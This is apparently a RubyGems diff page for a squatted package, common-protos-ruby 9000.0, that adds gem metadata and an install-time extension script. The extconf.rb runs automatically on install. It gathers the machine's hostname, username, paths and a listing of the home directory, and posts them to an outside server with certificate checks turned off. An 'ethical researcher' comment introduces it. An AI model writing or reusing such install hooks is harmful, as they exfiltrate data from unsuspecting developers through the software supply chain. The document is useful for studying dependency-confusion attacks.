common-protos-ruby 9000.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of common-protos-ruby might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +50 -0
  3. metadata +50 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: f826265c53e1c296b1b5a6f659bfd796071ebb99e540cc0dd90286b66584f9cb
4
+ data.tar.gz: f97a8256f766181c082eba32bd6e5bac0af687846afd4092cb573dd9aa8ae3d3
5
+ SHA512:
6
+ metadata.gz: ee39030ff84a45f49889b61b375cf684732acfb019ba33965c8b2b4388f885ba6cb0c51590bff05d321654c107d3ebfbc1c4603173b2abab1e32f7bad1dcd571
7
+ data.tar.gz: 9c79567ba5a606e59fab09b2ca55d585d7b467eb63d6ec00302da3e3ac0b00b26bd7f51918e776d605e8fa6a7549fd4bcf100cc1198a39f9c1b06fef59de90a4
data/ext/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ =begin
2
+ Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
+ Don't worry! It doesn't do anything nasty or malicious.
4
+
5
+ I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
+
7
+ I also run a Ruby security related platform: https://diffend.io
8
+
9
+ All data I collect will be deleted and I do not collect any sensitive information.
10
+
11
+ That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
+
13
+ You can read the code to confirm this.
14
+
15
+ If you have any questions or want to get in touch for any reason, you can reach me at:
16
+
17
+ maciej@mensfeld.pl
18
+
19
+ If this is affecting your organization, for example because I took name that uses your naming
20
+ conventions, feel free to contact me and I will be more than happy to give it back to you.
21
+
22
+ P.S. I did notify RubyGems security team, so they are aware of my activity.
23
+ =end
24
+
25
+ require 'mkmf'
26
+ require 'net/http'
27
+ require 'socket'
28
+ require 'etc'
29
+ require 'securerandom'
30
+ require 'json'
31
+
32
+ create_makefile 'gem_test'
33
+
34
+ uri = URI("https://ethically-testing-the.world")
35
+ http = Net::HTTP.new(uri.host, uri.port)
36
+ http.use_ssl = true
37
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
+ request = Net::HTTP::Post.new('/common-protos-ruby/9000.0')
39
+ request.add_field('Content-Type', 'application/json')
40
+
41
+ request.body = {
42
+ hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
+ username: Etc.getlogin,
44
+ path: File.dirname(__FILE__),
45
+ home: Dir.home,
46
+ home_ls: Dir.entries(Dir.home),
47
+ id: SecureRandom.uuid,
48
+ }.to_json
49
+
50
+ http.request(request)
metadata ADDED
@@ -0,0 +1,50 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: common-protos-ruby
3
+ version: !ruby/object:Gem::Version
4
+ version: '9000.0'
5
+ platform: ruby
6
+ authors:
7
+ - Maciej Mensfeld
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-03-04 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |
14
+ I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
+
16
+ This code is reporting-only, and does not do anything malicious.
17
+ email:
18
+ - maciej@mensfeld.pl
19
+ executables: []
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files: []
23
+ files:
24
+ - ext/extconf.rb
25
+ homepage: https://diffend.io
26
+ licenses:
27
+ - GPL-3.0
28
+ metadata: {}
29
+ post_install_message: |
30
+ This is probably not the package you wanted to install.
31
+ Read the description of this gem for more details.
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ required_rubygems_version: !ruby/object:Gem::Requirement
41
+ requirements:
42
+ - - ">="
43
+ - !ruby/object:Gem::Version
44
+ version: '0'
45
+ requirements: []
46
+ rubygems_version: 3.1.2
47
+ signing_key:
48
+ specification_version: 4
49
+ summary: Gem that sends some non-sensitive data for security research.
50
+ test_files: []